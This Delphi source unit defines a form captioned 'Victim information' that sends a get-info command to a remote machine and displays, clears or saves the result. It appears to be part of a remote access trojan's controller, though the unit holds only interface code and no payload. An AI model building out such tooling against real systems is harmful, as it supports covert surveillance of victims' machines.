unit untInformation;

interface

uses
  SysUtils, Classes, Controls, Forms, Buttons,
  StdCtrls, ComCtrls;

type
  TfrmInformation = class(TForm)
    RichInfo: TRichEdit;
    SpdRetrive: TSpeedButton;
    SpdClear: TSpeedButton;
    SpdSave: TSpeedButton;
    procedure SpdRetriveClick(Sender: TObject);
    procedure SpdClearClick(Sender: TObject);
    procedure SpdSaveClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmInformation: TfrmInformation;

implementation

uses untMain, untCommands;

{$R *.DFM}

procedure TfrmInformation.SpdRetriveClick(Sender: TObject);
begin
   frmMain.strStatus:='Retriving information...';
   frmMain.SendCommand(COMMAND_GETINFO,'');
end;

procedure TfrmInformation.SpdClearClick(Sender: TObject);
begin
   RichInfo.Text:='';
end;

procedure TfrmInformation.SpdSaveClick(Sender: TObject);
begin
   frmMain.SaveLines(RichInfo);
end;

procedure TfrmInformation.FormCreate(Sender: TObject);
begin
   Caption:='Victim information';
end;

end.
